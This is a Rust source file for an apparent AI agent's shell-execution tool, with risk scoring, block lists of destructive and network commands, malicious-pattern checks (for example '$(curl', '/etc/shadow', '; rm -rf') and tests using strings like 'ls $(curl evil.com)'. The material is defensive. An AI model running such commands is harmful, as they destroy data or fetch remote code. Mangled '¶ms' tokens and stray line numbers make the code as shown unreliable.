1use async_trait::async_trait;
5use serde::Deserialize;
6use serde_json::{json, Value};
7use std::collections::HashMap;
8use std::path::{Path, PathBuf};
9use std::process::Stdio;
10use tokio::process::Command;
11use tokio::time::{timeout, Duration};
12use uuid::Uuid;
13use chrono::Utc;
14use cfg_if::cfg_if;
15
16use super::{Tool, ToolContext, ToolResult, ToolError};
17use super::permission::{RiskLevel, create_permission_request};
18
/// Tool (id `"bash"`) that runs shell commands for a session after a heuristic risk
/// assessment and pattern-based validation, with a bounded timeout and capped output.
pub struct BashTool;
21
22#[derive(Debug, Deserialize)]
23struct BashParams {
24 command: String,
25 #[serde(default = "default_timeout")]
26 timeout: Option<u64>,
27 #[serde(default)]
28 description: Option<String>,
29 #[serde(default)]
30 environment: Option<HashMap<String, String>>,
31 #[serde(default)]
32 working_directory: Option<String>,
33}
34
/// Serde default for `BashParams::timeout`: two minutes, expressed in milliseconds.
fn default_timeout() -> Option<u64> {
    let two_minutes_ms: u64 = 2 * 60 * 1_000;
    Some(two_minutes_ms)
}
38
/// Upper bound, in milliseconds, for a command timeout (10 minutes).
const MAX_TIMEOUT: u64 = 10 * 60 * 1_000;

/// Combined stdout + stderr size, in bytes, above which captured output is truncated.
const MAX_OUTPUT_LENGTH: usize = 30 * 1_000;
41
/// Program names that `assess_command_risk` treats as potentially destructive.
const DANGEROUS_COMMANDS: &[&str] = &[
    // File and disk destruction
    "rm", "rmdir", "del", "format", "fdisk", "mkfs", "dd",
    // Power state
    "shutdown", "reboot", "halt", "init",
    // Process termination
    "kill", "killall", "pkill",
    // Privilege and account management
    "sudo", "su", "passwd",
    // Ownership and permissions
    "chown", "chmod",
    // Filesystems and services
    "mount", "umount", "systemctl", "service",
    // Firewall configuration
    "iptables", "ufw", "firewall-cmd",
];
49
/// Tooling that installs packages or changes system/infrastructure state; matched by
/// prefix against the invoked program in `assess_command_risk`.
const SYSTEM_COMMANDS: &[&str] = &[
    // Package managers
    "apt", "yum", "dnf", "pacman", "brew", "pip", "npm", "yarn", "cargo",
    // Source control, containers and infrastructure tooling
    "git", "docker", "kubectl", "terraform", "ansible",
];
55
56#[async_trait]
57impl Tool for BashTool {
58 fn id(&self) -> &str {
59 "bash"
60 }
61
62 fn description(&self) -> &str {
63 "Execute shell commands with security controls and timeout handling"
64 }
65
66 fn parameters_schema(&self) -> Value {
67 json!({
68 "type": "object",
69 "properties": {
70 "command": {
71 "type": "string",
72 "description": "The command to execute"
73 },
74 "timeout": {
75 "type": "number",
76 "description": "Optional timeout in milliseconds (max 600000ms / 10 minutes)",
77 "minimum": 1000,
78 "maximum": 600000
79 },
80 "description": {
81 "type": "string",
82 "description": "Clear, concise description of what this command does in 5-10 words"
83 },
84 "environment": {
85 "type": "object",
86 "description": "Additional environment variables",
87 "additionalProperties": {
88 "type": "string"
89 }
90 },
91 "workingDirectory": {
92 "type": "string",
93 "description": "Working directory for the command (relative to session working directory)"
94 }
95 },
96 "required": ["command"]
97 })
98 }
99
100 async fn execute(
101 &self,
102 args: Value,
103 ctx: ToolContext,
104 ) -> Result<ToolResult, ToolError> {
105 let params: BashParams = serde_json::from_value(args)
106 .map_err(|e| ToolError::InvalidParameters(e.to_string()))?;
107
108 let risk_assessment = self.assess_command_risk(¶ms.command);
110
111 self.validate_command_security(¶ms.command, &ctx)?;
113
114 let timeout_ms = params.timeout.unwrap_or(120_000).min(MAX_TIMEOUT);
116
117 let working_dir = if let Some(wd) = ¶ms.working_directory {
119 let requested_dir = if PathBuf::from(wd).is_absolute() {
120 PathBuf::from(wd)
121 } else {
122 ctx.working_directory.join(wd)
123 };
124
125 if !requested_dir.starts_with(&ctx.working_directory) {
127 return Err(ToolError::PermissionDenied(
128 "Working directory must be within session directory".to_string()
129 ));
130 }
131
132 requested_dir
133 } else {
134 ctx.working_directory.clone()
135 };
136
137 if risk_assessment.requires_permission {
139 let permission_request = create_permission_request(
140 Uuid::new_v4().to_string(),
141 ctx.session_id.clone(),
142 format!("Execute command: {}",
143 if params.command.len() > 50 {
144 format!("{}...", ¶ms.command[..50])
145 } else {
146 params.command.clone()
147 }
148 ),
149 risk_assessment.risk_level,
150 json!({
151 "command": params.command,
152 "description": params.description,
153 "working_directory": working_dir.to_string_lossy(),
154 "risk_factors": risk_assessment.risk_factors,
155 }),
156 );
157
158 if matches!(risk_assessment.risk_level, RiskLevel::High | RiskLevel::Critical) {
161 return Err(ToolError::PermissionDenied(format!(
162 "Command blocked due to security policy: {}",
163 risk_assessment.risk_factors.join(", ")
164 )));
165 }
166 }
167
168 let execution_result = self.execute_command(
170 ¶ms.command,
171 &working_dir,
172 timeout_ms,
173 ¶ms.environment,
174 &ctx,
175 ).await?;
176
177 let output = self.format_output(&execution_result)?;
179
180 let relative_wd = working_dir
182 .strip_prefix(&ctx.working_directory)
183 .unwrap_or(&working_dir)
184 .to_string_lossy()
185 .to_string();
186
187 let metadata = json!({
188 "command": params.command,
189 "description": params.description,
190 "exit_code": execution_result.exit_code,
191 "working_directory": relative_wd,
192 "timeout_ms": timeout_ms,
193 "stdout_bytes": execution_result.stdout.len(),
194 "stderr_bytes": execution_result.stderr.len(),
195 "truncated": execution_result.truncated,
196 "execution_time_ms": execution_result.execution_time_ms,
197 "risk_assessment": risk_assessment,
198 "timestamp": Utc::now().to_rfc3339(),
199 });
200
201 if execution_result.exit_code != 0 {
203 return Err(ToolError::ExecutionFailed(format!(
204 "Command exited with code {}: {}",
205 execution_result.exit_code,
206 output
207 )));
208 }
209
210 Ok(ToolResult {
211 title: params.description.unwrap_or_else(|| {
212 if params.command.len() > 50 {
213 format!("{}...", ¶ms.command[..50])
214 } else {
215 params.command.clone()
216 }
217 }),
218 metadata,
219 output,
220 })
221 }
222}
223
/// Result of `BashTool::assess_command_risk`; also serialized into the tool's result
/// metadata under `"risk_assessment"`.
#[derive(Debug, Clone, serde::Serialize)]
struct CommandRiskAssessment {
    /// Overall severity assigned by the risk rules.
    risk_level: RiskLevel,
    /// True when at least one rule asked for user permission.
    requires_permission: bool,
    /// Human-readable reasons, in the order the rules fired.
    risk_factors: Vec<String>,
}
230
/// Captured outcome of one command run by `BashTool::execute_command`.
#[derive(Debug)]
struct CommandExecutionResult {
    /// Standard output, lossily decoded as UTF-8 and possibly truncated.
    stdout: String,
    /// Standard error, lossily decoded as UTF-8 and possibly truncated.
    stderr: String,
    /// Process exit code; `-1` when the platform reported none (e.g. killed by a signal).
    exit_code: i32,
    /// Whether stdout/stderr were shortened to fit `MAX_OUTPUT_LENGTH`.
    truncated: bool,
    /// Wall-clock duration of the run, in milliseconds.
    execution_time_ms: u128,
}
239
240impl BashTool {
241 fn assess_command_risk(&self, command: &str) -> CommandRiskAssessment {
243 let mut risk_factors = Vec::new();
244 let mut risk_level = RiskLevel::Low;
245 let mut requires_permission = false;
246
247 let command_lower = command.to_lowercase();
248 let command_parts: Vec<&str> = command.split_whitespace().collect();
249 let base_command = command_parts.first().unwrap_or(&"").trim_start_matches("sudo ");
250
251 if DANGEROUS_COMMANDS.iter().any(|&cmd| base_command == cmd || base_command.ends_with(cmd)) {
253 risk_level = RiskLevel::Critical;
254 requires_permission = true;
255 risk_factors.push("Potentially destructive command".to_string());
256 }
257
258 if SYSTEM_COMMANDS.iter().any(|&cmd| base_command == cmd || base_command.starts_with(cmd)) {
260 risk_level = risk_level.max(RiskLevel::Medium);
261 requires_permission = true;
262 risk_factors.push("System modification command".to_string());
263 }
264
265 if command_lower.contains("sudo") || command_lower.contains("su ") {
267 risk_level = RiskLevel::Critical;
268 requires_permission = true;
269 risk_factors.push("Privilege escalation detected".to_string());
270 }
271
272 if command_lower.contains("curl") || command_lower.contains("wget") ||
274 command_lower.contains("nc ") || command_lower.contains("netcat") {
275 risk_level = risk_level.max(RiskLevel::Medium);
276 requires_permission = true;
277 risk_factors.push("Network operation".to_string());
278 }
279
280 if (command_lower.contains("rm ") || command_lower.contains("del ")) &&
282 (command_lower.contains("*") || command_lower.contains("?")) {
283 risk_level = RiskLevel::High;
284 requires_permission = true;
285 risk_factors.push("Bulk file deletion".to_string());
286 }
287
288 if command.contains("&&") || command.contains("||") || command.contains(";") ||
290 command.contains("|") || command.contains(">") || command.contains(">>") {
291 risk_level = risk_level.max(RiskLevel::Medium);
292 risk_factors.push("Complex shell operation".to_string());
293 }
294
295 CommandRiskAssessment {
296 risk_level,
297 requires_permission,
298 risk_factors,
299 }
300 }
301
302 fn validate_command_security(&self, command: &str, _ctx: &ToolContext) -> Result<(), ToolError> {
304 let malicious_patterns = [
306 "; rm -rf", "| rm -rf", "&& rm -rf", "|| rm -rf",
307 "$(curl", "$(wget", "`curl", "`wget",
308 "/etc/passwd", "/etc/shadow",
309 "format c:", "del /f /s /q",
310 ];
311
312 let command_lower = command.to_lowercase();
313 for pattern in &malicious_patterns {
314 if command_lower.contains(pattern) {
315 return Err(ToolError::PermissionDenied(format!(
316 "Command contains potentially malicious pattern: {}",
317 pattern
318 )));
319 }
320 }
321
322 if command.len() > 4096 {
324 return Err(ToolError::InvalidParameters(
325 "Command too long (>4096 characters)".to_string()
326 ));
327 }
328
329 Ok(())
330 }
331
332 async fn execute_command(
334 &self,
335 command: &str,
336 working_dir: &Path,
337 timeout_ms: u64,
338 environment: &Option<HashMap<String, String>>,
339 ctx: &ToolContext,
340 ) -> Result<CommandExecutionResult, ToolError> {
341 let start_time = std::time::Instant::now();
342
343 let mut cmd = self.create_platform_command(command);
345
346 cmd.current_dir(working_dir);
348
349 cmd.stdout(Stdio::piped())
351 .stderr(Stdio::piped())
352 .stdin(Stdio::null());
353
354 cmd.env("TERM", "xterm-256color");
356 cmd.env("FORCE_COLOR", "0"); cmd.env("NO_COLOR", "1");
358
359 if let Some(env) = environment {
360 for (key, value) in env {
361 if key.chars().all(|c| c.is_ascii_alphanumeric() || c == '_') {
363 cmd.env(key, value);
364 }
365 }
366 }
367
368 let output = match timeout(Duration::from_millis(timeout_ms), cmd.output()).await {
370 Ok(Ok(output)) => output,
371 Ok(Err(e)) => {
372 return Err(ToolError::ExecutionFailed(format!("Command failed to start: {}", e)));
373 }
374 Err(_) => {
375 return Err(ToolError::ExecutionFailed(format!(
376 "Command timed out after {} ms",
377 timeout_ms
378 )));
379 }
380 };
381
382 if *ctx.abort_signal.borrow() {
384 return Err(ToolError::Aborted);
385 }
386
387 let execution_time = start_time.elapsed().as_millis();
388
389 let stdout = String::from_utf8_lossy(&output.stdout);
391 let stderr = String::from_utf8_lossy(&output.stderr);
392
393 let combined_length = stdout.len() + stderr.len();
395 let truncated = combined_length > MAX_OUTPUT_LENGTH;
396
397 let (final_stdout, final_stderr) = if truncated {
398 let stdout_limit = MAX_OUTPUT_LENGTH * 3 / 4; let stderr_limit = MAX_OUTPUT_LENGTH - stdout_limit;
400
401 let truncated_stdout = if stdout.len() > stdout_limit {
402 format!("{}... (truncated)", &stdout[..stdout_limit])
403 } else {
404 stdout.to_string()
405 };
406
407 let truncated_stderr = if stderr.len() > stderr_limit {
408 format!("{}... (truncated)", &stderr[..stderr_limit])
409 } else {
410 stderr.to_string()
411 };
412
413 (truncated_stdout, truncated_stderr)
414 } else {
415 (stdout.to_string(), stderr.to_string())
416 };
417
418 Ok(CommandExecutionResult {
419 stdout: final_stdout,
420 stderr: final_stderr,
421 exit_code: output.status.code().unwrap_or(-1),
422 truncated,
423 execution_time_ms: execution_time,
424 })
425 }
426
427 fn create_platform_command(&self, command: &str) -> Command {
429 cfg_if! {
430 if #[cfg(target_os = "windows")] {
431 let mut cmd = Command::new("cmd");
432 cmd.args(["/C", command]);
433 cmd
434 } else {
435 let mut cmd = Command::new("bash");
436 cmd.args(["-c", command]);
437 cmd
438 }
439 }
440 }
441
442 fn format_output(&self, result: &CommandExecutionResult) -> Result<String, ToolError> {
444 let mut output_parts = Vec::new();
445
446 if !result.stdout.is_empty() {
447 output_parts.push(format!("<stdout>\n{}\n</stdout>", result.stdout));
448 }
449
450 if !result.stderr.is_empty() {
451 output_parts.push(format!("<stderr>\n{}\n</stderr>", result.stderr));
452 }
453
454 if output_parts.is_empty() {
455 output_parts.push("(no output)".to_string());
456 }
457
458 if result.truncated {
459 output_parts.push("\n(Output truncated due to length)".to_string());
460 }
461
462 Ok(output_parts.join("\n"))
463 }
464}
465
466impl RiskLevel {
467 fn max(self, other: RiskLevel) -> RiskLevel {
468 match (self, other) {
469 (RiskLevel::Critical, _) | (_, RiskLevel::Critical) => RiskLevel::Critical,
470 (RiskLevel::High, _) | (_, RiskLevel::High) => RiskLevel::High,
471 (RiskLevel::Medium, _) | (_, RiskLevel::Medium) => RiskLevel::Medium,
472 (RiskLevel::Low, RiskLevel::Low) => RiskLevel::Low,
473 }
474 }
475}
476
#[cfg(feature = "wasm")]
mod wasm_impl {
    use super::*;

    impl BashTool {
        /// WASM stand-in for `execute_command`: this build cannot spawn processes, so
        /// every call returns `ToolError::ExecutionFailed`.
        ///
        /// Declared `pub(super)` because a private method defined in this child module
        /// cannot be called from `Tool::execute` in the parent module.
        ///
        /// NOTE(review): this only builds if the parent's native `execute_command` is
        /// compiled out under the same feature. Two inherent methods with the same name
        /// on `BashTool` are a compile error.
        pub(super) async fn execute_command(
            &self,
            _command: &str,
            _working_dir: &Path,
            _timeout_ms: u64,
            _environment: &Option<HashMap<String, String>>,
            _ctx: &ToolContext,
        ) -> Result<CommandExecutionResult, ToolError> {
            Err(ToolError::ExecutionFailed(
                "Command execution not supported in WASM environment".to_string()
            ))
        }
    }
}
496
#[cfg(test)]
mod tests {
    use super::*;

    /// Minimal context rooted at `/tmp`; its abort sender is dropped immediately.
    fn test_context() -> ToolContext {
        ToolContext {
            session_id: "test".to_string(),
            message_id: "test".to_string(),
            abort_signal: tokio::sync::watch::channel(false).1,
            working_directory: PathBuf::from("/tmp"),
        }
    }

    #[test]
    fn test_risk_assessment() {
        let tool = BashTool;
        let cases = [
            ("ls -la", RiskLevel::Low, false),
            ("git clone https://github.com/user/repo", RiskLevel::Medium, true),
            ("rm -rf *.log", RiskLevel::High, true),
            ("sudo rm -rf /", RiskLevel::Critical, true),
        ];

        for (command, expected_level, expects_permission) in cases.iter() {
            let assessment = tool.assess_command_risk(command);
            assert_eq!(
                assessment.risk_level, *expected_level,
                "risk level of {:?}", command
            );
            assert_eq!(
                assessment.requires_permission, *expects_permission,
                "permission flag of {:?}", command
            );
        }
    }

    #[test]
    fn test_security_validation() {
        let tool = BashTool;
        let ctx = test_context();

        assert!(tool.validate_command_security("ls -la", &ctx).is_ok());

        for malicious in ["ls; rm -rf /", "ls $(curl evil.com)"].iter() {
            assert!(
                tool.validate_command_security(malicious, &ctx).is_err(),
                "{:?} should be rejected", malicious
            );
        }
    }
}